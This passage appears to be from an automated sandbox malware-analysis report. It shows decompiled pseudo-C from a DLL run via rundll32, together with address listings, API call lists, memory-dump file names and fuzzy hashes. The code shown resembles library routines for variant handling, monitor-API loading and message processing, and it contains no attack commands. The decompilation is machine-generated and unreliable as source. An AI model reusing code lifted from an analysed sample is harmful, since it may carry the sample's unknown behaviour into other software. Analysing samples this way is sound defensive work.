					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10014517(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E100012C0(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E100201BD(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

































                                                                                                                          0x1002db49
                                                                                                                          0x1002db50
                                                                                                                          0x1002db55
                                                                                                                          0x1002db58
                                                                                                                          0x1002db5c
                                                                                                                          0x1002e035
                                                                                                                          0x1002e03a
                                                                                                                          0x1002e03a
                                                                                                                          0x1002db62
                                                                                                                          0x1002db65
                                                                                                                          0x1002db68
                                                                                                                          0x1002db6b
                                                                                                                          0x1002db75
                                                                                                                          0x1002db78
                                                                                                                          0x1002db7d
                                                                                                                          0x1002db83
                                                                                                                          0x1002db8e
                                                                                                                          0x1002db8e
                                                                                                                          0x1002db95
                                                                                                                          0x1002db9c
                                                                                                                          0x1002dba1
                                                                                                                          0x1002dba8
                                                                                                                          0x1002dba8
                                                                                                                          0x1002dbab
                                                                                                                          0x1002dbb2
                                                                                                                          0x1002dbb5
                                                                                                                          0x1002dbb8
                                                                                                                          0x1002dbbb
                                                                                                                          0x1002dbbe
                                                                                                                          0x1002dbc1
                                                                                                                          0x1002dbc5
                                                                                                                          0x1002dbc9
                                                                                                                          0x1002dbca
                                                                                                                          0x1002ddea
                                                                                                                          0x1002ddee
                                                                                                                          0x1002ddf0
                                                                                                                          0x1002ddf9
                                                                                                                          0x1002ddfb
                                                                                                                          0x1002ddfb
                                                                                                                          0x1002de08
                                                                                                                          0x1002de10
                                                                                                                          0x1002de12
                                                                                                                          0x1002de27
                                                                                                                          0x1002de3e
                                                                                                                          0x1002de41
                                                                                                                          0x1002de46
                                                                                                                          0x1002de4b
                                                                                                                          0x1002de76
                                                                                                                          0x1002de76
                                                                                                                          0x1002de79
                                                                                                                          0x1002de82
                                                                                                                          0x1002de85
                                                                                                                          0x1002df5a
                                                                                                                          0x1002df5a
                                                                                                                          0x1002df60
                                                                                                                          0x1002e017
                                                                                                                          0x1002e01a
                                                                                                                          0x1002e01e
                                                                                                                          0x1002e023
                                                                                                                          0x1002e027
                                                                                                                          0x1002e02a
                                                                                                                          0x1002e02c
                                                                                                                          0x1002e02f
                                                                                                                          0x1002e034
                                                                                                                          0x00000000
                                                                                                                          0x1002e02a
                                                                                                                          0x1002df6a
                                                                                                                          0x1002df8f
                                                                                                                          0x1002df92
                                                                                                                          0x1002df95
                                                                                                                          0x1002df98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002df9a
                                                                                                                          0x00000000
                                                                                                                          0x1002dfab
                                                                                                                          0x1002dfb2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002e00f
                                                                                                                          0x1002e012
                                                                                                                          0x1002e015
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dfca
                                                                                                                          0x1002dfcd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dfd4
                                                                                                                          0x1002dfd7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dfb7
                                                                                                                          0x1002dfba
                                                                                                                          0x1002dfbd
                                                                                                                          0x1002dfbf
                                                                                                                          0x1002dfc2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dfe1
                                                                                                                          0x1002dfe6
                                                                                                                          0x1002dfe9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dff1
                                                                                                                          0x1002dff4
                                                                                                                          0x1002dff6
                                                                                                                          0x1002dffa
                                                                                                                          0x1002dffd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002e001
                                                                                                                          0x1002e004
                                                                                                                          0x1002e007
                                                                                                                          0x1002e008
                                                                                                                          0x1002e009
                                                                                                                          0x1002e00a
                                                                                                                          0x1002e00b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dfa7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002df9a
                                                                                                                          0x1002df6e
                                                                                                                          0x1002df73
                                                                                                                          0x1002df79
                                                                                                                          0x1002df7b
                                                                                                                          0x1002df7d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002df83
                                                                                                                          0x1002df89
                                                                                                                          0x1002dea1
                                                                                                                          0x1002dea1
                                                                                                                          0x1002dea6
                                                                                                                          0x1002dea6
                                                                                                                          0x1002dea9
                                                                                                                          0x1002deb2
                                                                                                                          0x1002deb2
                                                                                                                          0x1002deb7
                                                                                                                          0x1002debd
                                                                                                                          0x1002dec0
                                                                                                                          0x1002dec2
                                                                                                                          0x1002dec6
                                                                                                                          0x1002dec8
                                                                                                                          0x1002ded0
                                                                                                                          0x1002ded1
                                                                                                                          0x1002ded7
                                                                                                                          0x1002ded7
                                                                                                                          0x1002ded9
                                                                                                                          0x1002dedf
                                                                                                                          0x1002dee5
                                                                                                                          0x1002deed
                                                                                                                          0x1002def5
                                                                                                                          0x1002def8
                                                                                                                          0x1002def8
                                                                                                                          0x1002df03
                                                                                                                          0x1002df09
                                                                                                                          0x1002df0b
                                                                                                                          0x1002df12
                                                                                                                          0x1002df17
                                                                                                                          0x1002df1a
                                                                                                                          0x1002df1a
                                                                                                                          0x1002df22
                                                                                                                          0x1002df24
                                                                                                                          0x1002df2b
                                                                                                                          0x1002df30
                                                                                                                          0x1002df33
                                                                                                                          0x1002df33
                                                                                                                          0x1002df3b
                                                                                                                          0x1002df40
                                                                                                                          0x1002df46
                                                                                                                          0x1002df52
                                                                                                                          0x1002df55
                                                                                                                          0x00000000
                                                                                                                          0x1002df55
                                                                                                                          0x1002de8f
                                                                                                                          0x1002de95
                                                                                                                          0x1002de9c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002de9e
                                                                                                                          0x00000000
                                                                                                                          0x1002de4d
                                                                                                                          0x1002de50
                                                                                                                          0x1002de56
                                                                                                                          0x1002de71
                                                                                                                          0x1002de71
                                                                                                                          0x1002de74
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002de5c
                                                                                                                          0x1002de5e
                                                                                                                          0x1002de60
                                                                                                                          0x1002de66
                                                                                                                          0x1002de67
                                                                                                                          0x1002de6d
                                                                                                                          0x1002de6d
                                                                                                                          0x1002de70
                                                                                                                          0x1002de70
                                                                                                                          0x00000000
                                                                                                                          0x1002de70
                                                                                                                          0x1002de62
                                                                                                                          0x1002de64
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002de64
                                                                                                                          0x00000000
                                                                                                                          0x1002de71
                                                                                                                          0x1002dbd0
                                                                                                                          0x1002dbd4
                                                                                                                          0x1002dbd5
                                                                                                                          0x1002dbe4
                                                                                                                          0x1002dbef
                                                                                                                          0x1002dbf2
                                                                                                                          0x1002dbfa
                                                                                                                          0x1002dbfd
                                                                                                                          0x1002dc00
                                                                                                                          0x1002dc06
                                                                                                                          0x1002dc06
                                                                                                                          0x1002dc0a
                                                                                                                          0x1002dc0d
                                                                                                                          0x1002dc10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc16
                                                                                                                          0x1002dc1b
                                                                                                                          0x1002dc1e
                                                                                                                          0x1002dc24
                                                                                                                          0x1002dc27
                                                                                                                          0x1002dc2a
                                                                                                                          0x1002dc2d
                                                                                                                          0x1002dc33
                                                                                                                          0x1002dc36
                                                                                                                          0x1002dc39
                                                                                                                          0x1002dc43
                                                                                                                          0x1002dc43
                                                                                                                          0x1002dc46
                                                                                                                          0x1002dc4e
                                                                                                                          0x1002dc50
                                                                                                                          0x1002dd6d
                                                                                                                          0x1002dd72
                                                                                                                          0x1002dd75
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd77
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd7e
                                                                                                                          0x1002dd81
                                                                                                                          0x1002dd83
                                                                                                                          0x1002dd89
                                                                                                                          0x1002dd93
                                                                                                                          0x1002dd9a
                                                                                                                          0x1002dd9c
                                                                                                                          0x1002dda8
                                                                                                                          0x1002ddac
                                                                                                                          0x1002ddb1
                                                                                                                          0x1002ddb5
                                                                                                                          0x1002ddb9
                                                                                                                          0x1002ddbb
                                                                                                                          0x1002ddbe
                                                                                                                          0x1002ddc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc56
                                                                                                                          0x1002dc56
                                                                                                                          0x1002ddc6
                                                                                                                          0x1002ddc6
                                                                                                                          0x1002ddc9
                                                                                                                          0x1002ddc9
                                                                                                                          0x1002ddcd
                                                                                                                          0x00000000
                                                                                                                          0x1002ddcd
                                                                                                                          0x1002dc5d
                                                                                                                          0x1002dc61
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc67
                                                                                                                          0x00000000
                                                                                                                          0x1002dc7c
                                                                                                                          0x1002dc7f
                                                                                                                          0x1002dc81
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dca4
                                                                                                                          0x1002dca8
                                                                                                                          0x1002dcad
                                                                                                                          0x1002dcb0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcb7
                                                                                                                          0x1002dcbb
                                                                                                                          0x1002dcc0
                                                                                                                          0x1002dcc3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcca
                                                                                                                          0x1002dccd
                                                                                                                          0x1002dccf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcd3
                                                                                                                          0x1002dcd6
                                                                                                                          0x1002dcd8
                                                                                                                          0x1002dcda
                                                                                                                          0x1002dcdb
                                                                                                                          0x1002dcde
                                                                                                                          0x1002dce4
                                                                                                                          0x1002dce8
                                                                                                                          0x1002dcea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcf0
                                                                                                                          0x1002dcf2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd45
                                                                                                                          0x1002dd48
                                                                                                                          0x1002dd4c
                                                                                                                          0x1002dd4e
                                                                                                                          0x1002dd50
                                                                                                                          0x1002dd50
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dd55
                                                                                                                          0x1002dd59
                                                                                                                          0x1002dd5c
                                                                                                                          0x1002dd5f
                                                                                                                          0x1002dd61
                                                                                                                          0x1002dd62
                                                                                                                          0x1002dd63
                                                                                                                          0x1002dd64
                                                                                                                          0x1002dd65
                                                                                                                          0x1002dd68
                                                                                                                          0x1002dd6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dcfd
                                                                                                                          0x1002dcfd
                                                                                                                          0x1002dd00
                                                                                                                          0x1002dd02
                                                                                                                          0x1002dd04
                                                                                                                          0x1002dd05
                                                                                                                          0x1002dd08
                                                                                                                          0x1002dd0b
                                                                                                                          0x1002dd10
                                                                                                                          0x1002dd13
                                                                                                                          0x1002dd17
                                                                                                                          0x1002dd1d
                                                                                                                          0x1002dd21
                                                                                                                          0x1002dd23
                                                                                                                          0x1002dd29
                                                                                                                          0x1002dd29
                                                                                                                          0x1002dd2c
                                                                                                                          0x1002dd2f
                                                                                                                          0x1002dd32
                                                                                                                          0x1002dd37
                                                                                                                          0x1002dd3b
                                                                                                                          0x00000000
                                                                                                                          0x1002dd3b
                                                                                                                          0x1002dd25
                                                                                                                          0x1002dd27
                                                                                                                          0x1002dcf8
                                                                                                                          0x1002dcf8
                                                                                                                          0x00000000
                                                                                                                          0x1002dcf8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc6e
                                                                                                                          0x1002dc71
                                                                                                                          0x1002dc75
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc89
                                                                                                                          0x1002dc8c
                                                                                                                          0x1002dc8f
                                                                                                                          0x1002dc92
                                                                                                                          0x1002dc92
                                                                                                                          0x1002dc95
                                                                                                                          0x1002dc95
                                                                                                                          0x1002dc97
                                                                                                                          0x1002dc9c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002dc67
                                                                                                                          0x1002ddcf
                                                                                                                          0x1002ddcf
                                                                                                                          0x1002ddd3
                                                                                                                          0x1002ddd6
                                                                                                                          0x1002dddf
                                                                                                                          0x1002dddf
                                                                                                                          0x1002dde8
                                                                                                                          0x00000000
                                                                                                                          0x1002dde8

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4128688680-0
                                                                                                                          • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                          • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                          • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                          • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E10018B59() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100572e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x100572e8 = E10018B01(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100572c8 = 0;
						 *0x100572cc = 0;
						 *0x100572d0 = 0;
						 *0x100572d4 = 0;
						 *0x100572d8 = 0;
						 *0x100572dc = 0;
						 *0x100572e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100572c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100572cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100572d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100572d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100572dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100572d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100572e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100572e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x100572d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                          0x10018b5c
                                                                                                                          0x10018b62
                                                                                                                          0x10018b71
                                                                                                                          0x10018b7d
                                                                                                                          0x10018b88
                                                                                                                          0x10018b8a
                                                                                                                          0x10018b8c
                                                                                                                          0x10018c20
                                                                                                                          0x10018c20
                                                                                                                          0x10018c26
                                                                                                                          0x10018c2c
                                                                                                                          0x10018c32
                                                                                                                          0x10018c38
                                                                                                                          0x10018c3e
                                                                                                                          0x10018c44
                                                                                                                          0x10018c4a
                                                                                                                          0x10018b92
                                                                                                                          0x10018b9e
                                                                                                                          0x10018ba0
                                                                                                                          0x10018ba2
                                                                                                                          0x10018ba7
                                                                                                                          0x00000000
                                                                                                                          0x10018ba9
                                                                                                                          0x10018baf
                                                                                                                          0x10018bb1
                                                                                                                          0x10018bb3
                                                                                                                          0x10018bb8
                                                                                                                          0x00000000
                                                                                                                          0x10018bba
                                                                                                                          0x10018bc0
                                                                                                                          0x10018bc2
                                                                                                                          0x10018bc4
                                                                                                                          0x10018bc9
                                                                                                                          0x00000000
                                                                                                                          0x10018bcb
                                                                                                                          0x10018bd1
                                                                                                                          0x10018bd3
                                                                                                                          0x10018bd5
                                                                                                                          0x10018bda
                                                                                                                          0x00000000
                                                                                                                          0x10018bdc
                                                                                                                          0x10018be2
                                                                                                                          0x10018be4
                                                                                                                          0x10018be6
                                                                                                                          0x10018beb
                                                                                                                          0x00000000
                                                                                                                          0x10018bed
                                                                                                                          0x10018bf3
                                                                                                                          0x10018bf5
                                                                                                                          0x10018bf7
                                                                                                                          0x10018bfc
                                                                                                                          0x00000000
                                                                                                                          0x10018bfe
                                                                                                                          0x10018c04
                                                                                                                          0x10018c06
                                                                                                                          0x10018c08
                                                                                                                          0x10018c0d
                                                                                                                          0x00000000
                                                                                                                          0x10018c0f
                                                                                                                          0x10018c11
                                                                                                                          0x10018c11
                                                                                                                          0x10018c11
                                                                                                                          0x10018c0d
                                                                                                                          0x10018bfc
                                                                                                                          0x10018beb
                                                                                                                          0x10018bda
                                                                                                                          0x10018bc9
                                                                                                                          0x10018bb8
                                                                                                                          0x10018ba7
                                                                                                                          0x10018c14
                                                                                                                          0x10018c1f
                                                                                                                          0x10018b64
                                                                                                                          0x10018b66
                                                                                                                          0x10018b70
                                                                                                                          0x10018b70

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                          • API String ID: 667068680-68207542
                                                                                                                          • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                          • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                          • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                          • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1002A5D5(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
